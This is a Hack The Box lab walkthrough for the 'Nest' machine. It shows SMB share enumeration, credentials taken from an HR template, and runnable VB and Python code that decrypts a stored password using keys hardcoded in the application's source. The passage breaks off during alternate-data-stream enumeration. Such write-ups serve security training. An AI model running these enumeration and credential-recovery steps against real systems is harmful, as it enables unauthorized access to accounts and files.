Hack the Box Walkthrough: Nest


Overview

This post provides a walkthrough of the Nest system on Hack The Box. This walkthrough, in its entirety, is a spoiler.

I create these walkthroughs as documentation for myself while working through a system; excuse any brevity or lack of formality. I’ve uploaded this walkthrough to help those that may be stuck.

Service Enumeration

To kick things off, we start with some service discovery to figure out what is actually running on this box.

Nmap Scan

$ nmap -Pn -n -A -T5 -p1-65535 10.10.10.178
[snip]
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
[snip]
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
[snip]
Host script results:
|_clock-skew: 57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-25T04:18:48
|_  start_date: 2020-02-25T04:14:30
[snip]

Enumerating SMB Shares

Since TCP/445 is open, we can take a look to see what shares are available:

❯ smbclient -L \\\\10.10.10.178
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

The Data share seems to be accessible anonymously. We can recursively list the contents of the share with smbclient:

❯ smbclient  \\\\10.10.10.178\\Data
smb: \> recurse on 
smb: \> ls
  .                                   D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
  .                                   D        0  Wed Aug  7 15:07:51 2019
  ..                                  D        0  Wed Aug  7 15:07:51 2019
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019
\Shared\Maintenance
  .                                   D        0  Wed Aug  7 15:07:32 2019
  ..                                  D        0  Wed Aug  7 15:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019
\Shared\Templates
  .                                   D        0  Wed Aug  7 15:08:07 2019
  ..                                  D        0  Wed Aug  7 15:08:07 2019
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019
\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 15:08:06 2019
  ..                                  D        0  Wed Aug  7 15:08:06 2019

The Maintenance Alerts.txt and Welcome Email.txt files look potentially interesting. Let’s retrieve them with smbclient:

❯ smbclient  \\\\10.10.10.178\\Data
Try "help" to get a list of possible commands.
smb: \> cd Shared\Templates\HR\
smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
                10485247 blocks of size 4096. 6544122 blocks available
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \Shared\Templates\HR\> cd ../../Maintenance\
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)

Let’s see if there is anything interesting in the files:

❯ cat Maintenance\ Alerts.txt
There is currently no scheduled maintenance work
❯ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR

Nice, we have a set of credentials for TempUser. Let’s see if that gives us any further access to the Data share:

❯ smbclient  \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019
\IT
  .                                   D        0  Wed Aug  7 18:58:07 2019
  ..                                  D        0  Wed Aug  7 18:58:07 2019
  Archive                             D        0  Mon Aug  5 18:33:58 2019
  Configs                             D        0  Wed Aug  7 18:59:34 2019
  Installs                            D        0  Wed Aug  7 18:08:30 2019
  Reports                             D        0  Sat Jan 25 19:09:13 2020
  Tools                               D        0  Mon Aug  5 18:33:43 2019
\Production
  .                                   D        0  Mon Aug  5 17:53:38 2019
  ..                                  D        0  Mon Aug  5 17:53:38 2019
\Reports
  .                                   D        0  Mon Aug  5 17:53:44 2019
  ..                                  D        0  Mon Aug  5 17:53:44 2019
\Shared
  .                                   D        0  Wed Aug  7 15:07:51 2019
  ..                                  D        0  Wed Aug  7 15:07:51 2019
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019
\IT\Archive
  .                                   D        0  Mon Aug  5 18:33:58 2019
  ..                                  D        0  Mon Aug  5 18:33:58 2019
\IT\Configs
  .                                   D        0  Wed Aug  7 18:59:34 2019
  ..                                  D        0  Wed Aug  7 18:59:34 2019
  Adobe                               D        0  Wed Aug  7 15:20:09 2019
  Atlas                               D        0  Tue Aug  6 07:16:18 2019
  DLink                               D        0  Tue Aug  6 09:25:27 2019
  Microsoft                           D        0  Wed Aug  7 15:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 15:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 16:01:13 2019
  Server Manager                      D        0  Tue Aug  6 09:25:19 2019
\IT\Installs
  .                                   D        0  Wed Aug  7 18:08:30 2019
  ..                                  D        0  Wed Aug  7 18:08:30 2019
\IT\Reports
  .                                   D        0  Sat Jan 25 19:09:13 2020
  ..                                  D        0  Sat Jan 25 19:09:13 2020
\IT\Tools
  .                                   D        0  Mon Aug  5 18:33:43 2019
  ..                                  D        0  Mon Aug  5 18:33:43 2019
\Shared\Maintenance
  .                                   D        0  Wed Aug  7 15:07:32 2019
  ..                                  D        0  Wed Aug  7 15:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019
\Shared\Templates
  .                                   D        0  Wed Aug  7 15:08:07 2019
  ..                                  D        0  Wed Aug  7 15:08:07 2019
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019
\IT\Configs\Adobe
  .                                   D        0  Wed Aug  7 15:20:09 2019
  ..                                  D        0  Wed Aug  7 15:20:09 2019
  editing.xml                        AH      246  Sat Aug  3 08:58:42 2019
  Options.txt                         A        0  Mon Oct 10 17:11:14 2011
  projects.xml                        A      258  Tue Jan  8 11:30:52 2013
  settings.xml                        A     1274  Wed Aug  7 15:19:12 2019
\IT\Configs\Atlas
  .                                   D        0  Tue Aug  6 07:16:18 2019
  ..                                  D        0  Tue Aug  6 07:16:18 2019
  Temp.XML                            A     1369  Wed Jun 11 03:38:22 2003
\IT\Configs\DLink
  .                                   D        0  Tue Aug  6 09:25:27 2019
  ..                                  D        0  Tue Aug  6 09:25:27 2019
\IT\Configs\Microsoft
  .                                   D        0  Wed Aug  7 15:23:26 2019
  ..                                  D        0  Wed Aug  7 15:23:26 2019
  Options.xml                         A     4598  Sat Mar  3 14:24:24 2012
\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 15:31:37 2019
  ..                                  D        0  Wed Aug  7 15:31:37 2019
  config.xml                          A     6451  Wed Aug  7 19:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 15:30:27 2019
\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 16:01:13 2019
  ..                                  D        0  Wed Aug  7 16:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 15:49:37 2019
\IT\Configs\Server Manager
  .                                   D        0  Tue Aug  6 09:25:19 2019
  ..                                  D        0  Tue Aug  6 09:25:19 2019
\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 15:08:06 2019
  ..                                  D        0  Wed Aug  7 15:08:06 2019
                10485247 blocks of size 4096. 6544122 blocks available

Looks like we have access to some files in the IT directory now. Let’s just recursively pull down all the files in the share:

❯ smbget -R  smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml                                                              
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt                                                              
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml                                                             
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml                                                             
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML                                                                 
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml                                                          
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml                                                     
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml                                                  
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml                                                       
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt                                                 
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt                                                     
Downloaded 16.65kB in 7 seconds

Analyzing the retrieved content, we find some interesting data in RU_Config.xml and config.xml.

Data//IT/Configs/RU Scanner/RU_Config.xml

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

This password looks encrypted, but I thought I would use it to try authenticating to the SMB shares just in case. Authentication failed, leading me to suspect that the password needs to be decrypted first.

Data//IT/Configs/NotepadPlusPlus/config.xml

<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
[SNIP]
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

So it looks like someone was accessing files on the Secure$ share as well as files on the C.Smith user’s desktop.

Let’s see if we can access anything in this share as TempUser:

❯ smbclient  \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> recurse on
smb: \> ls
  .                                   D        0  Wed Aug  7 19:08:12 2019
  ..                                  D        0  Wed Aug  7 19:08:12 2019
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

Interesting; it seems that TempUser cannot list any of the three top-level directories. I wasted a bit of time here putting two and two together, but ultimately I found that the IT\Carl\ folder (the path seen in the Notepad++ history above) was indeed listable:

❯ smbclient  \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse on
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 15:42:14 2019
  ..                                  D        0  Wed Aug  7 15:42:14 2019
  Docs                                D        0  Wed Aug  7 15:44:00 2019
  Reports                             D        0  Tue Aug  6 09:45:40 2019
  VB Projects                         D        0  Tue Aug  6 10:41:55 2019
\IT\Carl\Docs
  .                                   D        0  Wed Aug  7 15:44:00 2019
  ..                                  D        0  Wed Aug  7 15:44:00 2019
  ip.txt                              A       56  Wed Aug  7 15:44:16 2019
  mmc.txt                             A       73  Wed Aug  7 15:43:42 2019
\IT\Carl\Reports
  .                                   D        0  Tue Aug  6 09:45:40 2019
  ..                                  D        0  Tue Aug  6 09:45:40 2019
\IT\Carl\VB Projects
  .                                   D        0  Tue Aug  6 10:41:55 2019
  ..                                  D        0  Tue Aug  6 10:41:55 2019
  Production                          D        0  Tue Aug  6 10:07:13 2019
  WIP                                 D        0  Tue Aug  6 10:47:41 2019
\IT\Carl\VB Projects\Production
  .                                   D        0  Tue Aug  6 10:07:13 2019
  ..                                  D        0  Tue Aug  6 10:07:13 2019
\IT\Carl\VB Projects\WIP
  .                                   D        0  Tue Aug  6 10:47:41 2019
  ..                                  D        0  Tue Aug  6 10:47:41 2019
  RU                                  D        0  Fri Aug  9 11:36:45 2019
\IT\Carl\VB Projects\WIP\RU
  .                                   D        0  Fri Aug  9 11:36:45 2019
  ..                                  D        0  Fri Aug  9 11:36:45 2019
  RUScanner                           D        0  Wed Aug  7 18:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 10:45:36 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner
  .                                   D        0  Wed Aug  7 18:05:54 2019
  ..                                  D        0  Wed Aug  7 18:05:54 2019
  bin                                 D        0  Wed Aug  7 16:00:11 2019
  ConfigFile.vb                       A      772  Wed Aug  7 18:05:09 2019
  Module1.vb                          A      279  Wed Aug  7 18:05:44 2019
  My Project                          D        0  Wed Aug  7 16:00:11 2019
  obj                                 D        0  Wed Aug  7 16:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 11:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 08:55:27 2019
  SsoIntegration.vb                   A      133  Wed Aug  7 18:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 15:49:35 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
  .                                   D        0  Wed Aug  7 16:00:11 2019
  ..                                  D        0  Wed Aug  7 16:00:11 2019
  Debug                               D        0  Wed Aug  7 15:59:13 2019
  Release                             D        0  Tue Aug  6 08:55:26 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
  .                                   D        0  Wed Aug  7 16:00:11 2019
  ..                                  D        0  Wed Aug  7 16:00:11 2019
  Application.Designer.vb             A      441  Tue Aug  6 08:55:13 2019
  Application.myapp                   A      481  Tue Aug  6 08:55:13 2019
  AssemblyInfo.vb                     A     1163  Tue Aug  6 08:55:13 2019
  Resources.Designer.vb               A     2776  Tue Aug  6 08:55:13 2019
  Resources.resx                      A     5612  Tue Aug  6 08:55:13 2019
  Settings.Designer.vb                A     2989  Tue Aug  6 08:55:13 2019
  Settings.settings                   A      279  Tue Aug  6 08:55:13 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
  .                                   D        0  Wed Aug  7 16:00:11 2019
  ..                                  D        0  Wed Aug  7 16:00:11 2019
  x86                                 D        0  Wed Aug  7 15:59:18 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
  .                                   D        0  Wed Aug  7 15:59:13 2019
  ..                                  D        0  Wed Aug  7 15:59:13 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
  .                                   D        0  Tue Aug  6 08:55:26 2019
  ..                                  D        0  Tue Aug  6 08:55:26 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
  .                                   D        0  Wed Aug  7 15:59:18 2019
  ..                                  D        0  Wed Aug  7 15:59:18 2019
                10485247 blocks of size 4096. 6544122 blocks available

Looks like there is some source code written in Visual Basic. Let’s use smbget to recursively download the Secure$\IT\Carl directory for further analysis:

❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 0b in 6 seconds

Looking at this data, we find some interesting code in Module1.vb and Utils.vb. As far as content we are interested in, Module1.vb uses Utils.vb to decrypt the password it retrieves from the RU_config.xml configuration file.

We can piece some of this code together into a single file we can run on https://dotnetfiddle.net:

Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    ' Serialisable wrapper for RU_config.xml (carried over from ConfigFile.vb; not used by Main)
    Public Class ConfigFile
        Public Property Port As Integer
        Public Property Username As String
        Public Property Password As String

        Public Sub SaveToFile(Path As String)
            Using File As New System.IO.FileStream(Path, System.IO.FileMode.Create)
                Dim Writer As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
                Writer.Serialize(File, Me)
            End Using
        End Sub

        Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile
            Using File As New System.IO.FileStream(FilePath, System.IO.FileMode.Open)
                Dim Reader As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
                Return DirectCast(Reader.Deserialize(File), ConfigFile)
            End Using
        End Function
    End Class

    ' Every parameter of the scheme (passphrase, salt, iteration count, IV, key size) is a
    ' constant in the source, so anyone holding the code can reverse the "encryption".
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    ' PBKDF2 (Rfc2898DeriveBytes, HMAC-SHA1, 2 iterations) -> AES key; AES-CBC with a fixed
    ' ASCII IV; CryptoStream strips the PKCS#7 padding on read.
    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String
        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
        Dim cipherTextBytes As Byte()
        cipherTextBytes = System.Convert.FromBase64String(cipherText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
        Dim memoryStream As System.IO.MemoryStream
        memoryStream = New System.IO.MemoryStream(cipherTextBytes)
        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)   ' plaintext is never longer than the ciphertext
        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)
        memoryStream.Close()
        cryptoStream.Close()
        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)
        ' Added for the walkthrough: print the recovered plaintext before returning it
        System.Console.WriteLine(plainText)
        Return plainText
    End Function

    Public Class SsoIntegration
        Public Property Username As String
        Public Property Password As String
    End Class

    ' Entry point: the ciphertext is the <Password> value from RU_config.xml
    Public Shared Sub Main()
        Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub
End Class

Note that I inserted a line to print the plainText variable before the Decrypt function returns. The above code on https://dotnetfiddle.net gives us xRxRxPANCAK3SxRxRx as the plaintext output. This is the password for the c.smith user.
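The same decryption in stdlib-only Python, as an added example that is not code from the walkthrough or from the RU Scanner project: it mirrors Utils.Decrypt step by step (PBKDF2-HMAC-SHA1 for the key, AES-256-CBC with the fixed ASCII IV, PKCS#7 unpadding) with a small AES implementation so it runs offline without third-party packages. The function names (ru_scanner_decrypt, aes_cbc_decrypt) and the helper layout are mine; the passphrase, salt, iteration count, IV, key size and ciphertext are the values shown above. The point for a defender is that nothing here needs a secret the attacker lacks: every input to the key derivation ships with the application, so the config "encryption" is obfuscation, and the real control is keeping the source and config off a share that a temporary account can read.

```python
"""Stdlib-only re-implementation of RU Scanner's Decrypt(): PBKDF2 -> AES-256-CBC -> PKCS#7."""
import base64
import hashlib


# ---- GF(2^8) arithmetic and AES tables (generated at import; no 256-entry literals) ----
def _xtime(a):
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _gmul(a, b):
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _gf_inv(x):
    # x^254 == x^-1 in GF(2^8); the loop also yields 0 for x == 0, as the S-box needs
    r, b, e = 1, x, 254
    while e:
        if e & 1:
            r = _gmul(r, b)
        b, e = _gmul(b, b), e >> 1
    return r


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _sbox_entry(x):
    i = _gf_inv(x)
    return i ^ _rotl8(i, 1) ^ _rotl8(i, 2) ^ _rotl8(i, 3) ^ _rotl8(i, 4) ^ 0x63


SBOX = [_sbox_entry(x) for x in range(256)]
INV_SBOX = [0] * 256
for _i, _v in enumerate(SBOX):
    INV_SBOX[_v] = _i
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def _expand_key(key):
    """FIPS-197 key schedule; one 16-byte round key per round (15 for AES-256)."""
    nk, nr = len(key) // 4, len(key) // 4 + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]      # SubWord(RotWord(t))
            t[0] ^= RCON[i // nk - 1]
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]                  # extra SubWord for 256-bit keys
        w.append([a ^ b for a, b in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)]


def _inv_shift_rows(s):
    # state index is r + 4*c (column-major, as in FIPS-197)
    return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out


def _decrypt_block(round_keys, block):
    nr = len(round_keys) - 1
    s = [b ^ k for b, k in zip(block, round_keys[nr])]
    for rnd in range(nr - 1, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, round_keys[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, round_keys[0]))


def aes_cbc_decrypt(key, iv, ciphertext):
    """AES-CBC decrypt with PKCS#7 unpadding (what .NET's CryptoStream does by default)."""
    if len(ciphertext) % 16 or len(iv) != 16:
        raise ValueError("ciphertext must be whole blocks and the IV 16 bytes")
    rk, prev, out = _expand_key(key), bytes(iv), bytearray()
    for i in range(0, len(ciphertext), 16):
        blk = ciphertext[i:i + 16]
        out += bytes(p ^ q for p, q in zip(_decrypt_block(rk, blk), prev))
        prev = blk
    pad = out[-1] if out else 0
    if not 1 <= pad <= 16 or out[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding")
    return bytes(out[:-pad])


def ru_scanner_decrypt(cipher_b64, pass_phrase="N3st22", salt="88552299",
                       iterations=2, init_vector="464R5DFA5DL6LE28", key_size=256):
    """Mirror of Utils.Decrypt: Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1 over the UTF-8 passphrase."""
    key = hashlib.pbkdf2_hmac("sha1", pass_phrase.encode("utf-8"), salt.encode("ascii"),
                              iterations, key_size // 8)
    plain = aes_cbc_decrypt(key, init_vector.encode("ascii"), base64.b64decode(cipher_b64))
    return plain.decode("ascii")


if __name__ == "__main__":
    # Ciphertext is the <Password> value from RU_config.xml
    print(ru_scanner_decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
```

Two iterations of PBKDF2 with a fixed salt would be weak even if the passphrase were secret; here it is not, so the derivation only adds a few microseconds of work for whoever reads Utils.vb.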

Enumeration as C.Smith

Let’s see if we have any meaningful access to content in the Users SMB share:

❯ smbclient  \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: 
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 02:21:44 2020
  ..                                  D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       32  Thu Aug  8 19:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 08:18:42 2019
  ..                                  D        0  Fri Aug  9 08:18:42 2019
  HqkLdap.exe                         A    17408  Wed Aug  7 19:41:16 2019

Getting User Flag

As we can see from the above output, the user flag is located in Users\C.Smith\user.txt:

smb: \C.Smith\> get user.txt 
getting file \C.Smith\user.txt of size 32 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

❯ cat user.txt
[redacted]

Privilege Elevation

I initially came across the Debug Mode Password.txt file and thought this could be used to authenticate to the DEBUG mode of the “HQK Reporting Service v1.2” service running on port 4386. The file appeared to have 0 bytes. I spent some time searching around further and couldn’t find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could potentially have had alternate streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file:

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
